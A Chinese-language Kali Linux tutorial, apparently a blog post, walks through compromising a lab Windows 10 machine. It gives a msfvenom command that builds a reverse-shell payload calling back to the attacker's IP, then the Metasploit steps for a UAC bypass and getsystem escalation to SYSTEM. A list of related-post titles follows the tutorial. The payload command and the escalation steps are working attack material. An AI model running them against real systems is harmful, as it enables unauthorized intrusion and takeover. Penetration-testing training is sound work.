Kali Linux渗透测试--windows 10入侵和提权过程
在进行入侵检测之前,配置好网络环境,使其相互连通,才能进行入侵。在使用Metasploit成功入侵之后拿到的只是一个基础的shell,要想拿到系统级别的shell,添加系统用户,获取用户登录口令,还需要进一步提权。
一、Metasploit对windows 10入侵测试
环境
攻击机:Kali Linux 2019 ip:192.168.5.11
目标主机:Windows 10 ip:192.168.2.104
1.1生成exe文件,并在目标主机打开
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.11 LPORT=1000 -f exe -o met.exe
1.2.设置payload,设置本地IP和监听端口
1.3.运行入侵测试,并获得基础的shell
二、输入background隐藏此界面,然后进一步提权
msf5> use exploit/windows/local/bypassuac_eventvwr
msf5 exploit(bypassuac) > set session 3
msf5 exploit(bypassuac) > exploit
然会生成另一个session,可以进行提权操作了,提权过程中并不需要设置端口号了,默认4444即可
2.1.输入命令gesystem提权,第一次getuid,显示普通用户权限,第二次是系统权限
2.2.获得shell之后,敲入dir命令乱码显示,只要输入chcp 65001,即可解决
Kali Linux渗透测试--windows 10入侵和提权过程相关推荐
- Kali Linux 渗透测试 博客记录
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的<Kali Linux 渗透测试>课程 文章为长时间连载,内容具有连续性,禁止转载! --- ...
- Kali Linux渗透测试——MSF基础篇
笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程 Metasploit是目前最流行.最强大.最具扩展性的渗透测试平台,一定程度上统一了渗透测试和漏洞研究的工作环境,使得新的攻击代码比 ...
- Kali Linux渗透测试——信息收集
笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程 渗透测试标准(PTES:http://www.pentest-standard.org)的七个阶段: 1.前期交互阶段:讨论确定渗透 ...
- 《Kali Linux渗透测试的艺术》—第2章2.3节安全测试方法论
本节书摘来自异步社区<Kali Linux渗透测试的艺术>一书中的第2章2.3节安全测试方法论,作者[英]Lee Allen , [印尼]Tedi Heriyanto , [英]Shake ...
- Kali Linux渗透测试 073 扫描工具-Vega
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的<Kali Linux 渗透测试>课程 vega 简介 使用基本流程 扫描的基本使用 使用截 ...
- 视频教程-Kali Linux渗透测试全程课与脚本语言编程系列课程-渗透测试
Kali Linux渗透测试全程课与脚本语言编程系列课程 本人有多年的服务器高级运维与开发经验,擅长计算机与服务器攻防及网络攻防技术!对网络安全领域有持续的关注和研究! 林晓炜 ¥899.00 立即订 ...
- KALI LINUX渗透测试学习笔记
KALI LINUX渗透测试学习笔记 (苑房弘主讲) 第1章 课程介绍 任务1:Kali Linux渗透测试介绍.exe 安全问题的根源: 分层思想 只求功能实现 最大的威胁是人 渗透测试: 尝试挫败 ...
- Kali Linux渗透测试——无线渗透
笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程,以及文章: https://blog.csdn.net/qq_38265137/article/details/80370554 h ...
- Kali Linux渗透测试 093 自动注入-Sqlmap
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的<Kali Linux 渗透测试>课程 Kali Linux渗透测试(苑房弘)博客记录 1. ...
最新文章
- 《数据科学家养成手册》第十章--混沌论
- C++开源跨平台类库集
- Python核心模块——urllib模块
- Exchange server 2010 beta安装部署流程
- dataTables中文文档API和样例
- 你可以去学python_你是怎么学好Python的?
- 《等离子体所毕业生经验分享会》观后感 2020-07-03
- 2020年后台开发程序员应该学习的8大技术
- 实用垃圾收集,第1部分–简介
- PIE SDK矢量数据的读取
- ubuntu linux运行exe文件,Linux Ubuntu 打开.exe文件
- linux与windows共享(四)
- Elasticjob安装与入门
- 2021年下半年软件设计师下午真题及答案解析
- linux卸载kodi,如何在Ubuntu 18.04上安装Kodi
- 电信套餐2020一览表_移动联通接连放大招,5G 套餐要降价?
- 脊髓空洞症先知先觉早期症状
- 顶部BANNER广告图片放大后再自动缩小消失
- veek-soc-iii_所以您想使用招聘人员第III部分-警告
- mesh 协调器 路由器_为什么WiFi6和MESH是绝配
热门文章
- java 大文件上传 断点续传(Socket、IO流)
- 使用 apifm-wxapi 开发微信小程序之用户信息/实名认证
- 全球与中国1,3-环己二甲胺行业需求动态及投资前景预测报告(2022-2027)
- 让自己对bff层有个了解--服务于前端的后端
- 计算机公式乘以百分之十五,EXCEL表格数据乘以15的公式【EXCEL表格中可以套用公式来实现输入数据后自动乘以某个数据的计算吗?】...
- 高数上册第七章小结笔记
- Windows install.
- 一秒钟看懂SaaS、CRM、OA、ERP、HR、进销存
- win10英语语言包
- micro-app-vue2 vue3 超详细快速入门指南 学习记录